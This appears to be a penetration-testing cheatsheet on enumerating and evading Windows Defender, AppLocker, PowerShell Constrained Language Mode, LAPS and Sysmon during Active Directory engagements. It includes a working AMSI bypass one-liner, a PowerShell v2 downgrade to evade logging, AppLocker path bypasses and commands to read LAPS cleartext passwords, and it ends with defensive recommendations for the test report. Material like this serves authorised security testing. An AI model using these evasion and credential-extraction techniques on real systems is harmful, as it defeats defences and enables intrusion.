🛡️ Methodology Checklist
- Identify AV/EDR solution:
Get-MpComputerStatus(Defender), process list - Check AppLocker:
Get-AppLockerPolicy -Effective - Check PowerShell Constrained Language Mode:
$ExecutionContext.SessionState.LanguageMode - Check LAPS deployment:
Get-LAPSPasswordorGet-DomainComputer -Properties ms-mcs-admpwd - Identify SIEM/logging: Event Log forwarding, Sysmon presence
- Adjust attack approach based on controls: LOTL, obfuscation, AMSI bypass
🎯 Operational Context
Use when: Early in AD engagement — identify what defender products, AV, EDR, and GPO restrictions are deployed before selecting attack tools and evasion techniques.
Think Dumber First: Check sc query windefend and Get-MpComputerStatus before running Mimikatz. Check AppLocker with Get-AppLockerPolicy before attempting PowerShell payloads. 30 seconds of recon saves hours of failed attempts.
Skip when: Scope explicitly excludes evasion — “assumed breach” scenarios may not require EDR bypass.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
Get-MpComputerStatus | Check Windows Defender status (look for RealTimeProtectionEnabled) |
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections | Enumerate AppLocker rules — check PathConditions for bypass gaps |
$ExecutionContext.SessionState.LanguageMode | Check PowerShell Constrained Language Mode (CLM) |
Find-LAPSDelegatedGroups | LAPSToolkit — groups delegated to read LAPS passwords |
Find-AdmPwdExtendedRights | LAPSToolkit — users with “All Extended Rights” (can read LAPS passwords) |
Get-LAPSComputers | LAPSToolkit — extract LAPS cleartext passwords (requires appropriate rights) |
powershell.exe -version 2 | Downgrade to PS v2 to bypass Script Block Logging |
Get-host | Confirm current PowerShell version |
netsh advfirewall show allprofiles | View Windows Firewall rules across all profiles |
🔬 Deep Dive & Workflow
Why Enumerate Controls Before Exploiting
Security policies are applied inconsistently across domains — a tool blocked on the DC may run fine on a workstation. Map the defensive landscape on each target host before choosing your toolset.
Windows Defender
Get-MpComputerStatusKey field: RealTimeProtectionEnabled : True = Defender is active and will block standard tools like PowerView by default. Use obfuscated versions, AMSI bypass techniques, or native alternatives.
AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionsAppLocker whitelists executables, scripts, DLLs, and installers. Common bypass: admins block %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe but forget:
- 32-bit path:
%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell_ISE.exe- Alternate script execution paths
Always review PathConditions in the output to identify gaps.
PowerShell Constrained Language Mode (CLM)
$ExecutionContext.SessionState.LanguageMode
# FullLanguage = unrestricted
# ConstrainedLanguage = COM objects, .NET types, and PS classes blockedCLM blocks most post-exploitation frameworks. Downgrading to PSv2 bypasses CLM and Script Block Logging:
Get-host # confirm version 5.x
powershell.exe -version 2
Get-host # should show version 2.0Note: The downgrade command itself is logged in Windows Event logs even though subsequent commands are not.
LAPS (Local Administrator Password Solution)
LAPS randomizes local admin passwords per machine to prevent lateral movement via hash reuse. LAPSToolkit reveals who can read these passwords:
# Who has delegation to read LAPS passwords?
Find-LAPSDelegatedGroups
# Who has "All Extended Rights" (less obvious but equally dangerous)?
Find-AdmPwdExtendedRights
# Read the actual LAPS password (requires rights)
Get-LAPSComputersLAPS Extended Rights trap: Accounts that join computers to the domain receive “All Extended Rights” over those hosts automatically — including LAPS password read access. These standard users are often less protected than dedicated admin groups. Hunt for them.
Control Enumeration Priority
1. Defender → determine if tooling needs obfuscation
2. AppLocker → find execution gaps before dropping binaries
3. CLM → determine if PowerShell-based tools will work
4. LAPS → if present, find who can read it; those passwords = lateral movement
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Get-MpComputerStatus returns error | PowerShell constrained language mode | Use sc query WinDefend via cmd.exe instead; check service status directly |
| AppLocker GPO not visible | No GPO read rights | Try reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 directly |
| EDR process not recognizable | Custom EDR or branded product | Check running services: Get-Service | where {$_.Status -eq 'Running'} and research unfamiliar names |
| AMSI bypass fails | AMSI patched or updated | Try alternative: [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0) |
| Sysmon events visible in logs | Sysmon deployed | Enumerate Sysmon config: sysmon -c to understand what’s logged; avoid logged event types |
📝 Reporting Trigger
Finding Title: Security Control Enumeration Enables Targeted Evasion Impact: Identifying deployed AV, EDR, AppLocker, and AMSI configurations allows an attacker to select payloads and techniques that specifically evade detected security controls, maintaining stealth throughout the engagement. Root Cause: Security control configurations are visible to authenticated users. No privileged access required to enumerate most defender settings. Recommendation: Implement SIEM alerting on security control enumeration activity. Harden AMSI and ensure AV signatures are current. Apply Defense in Depth — single EDR solution is insufficient.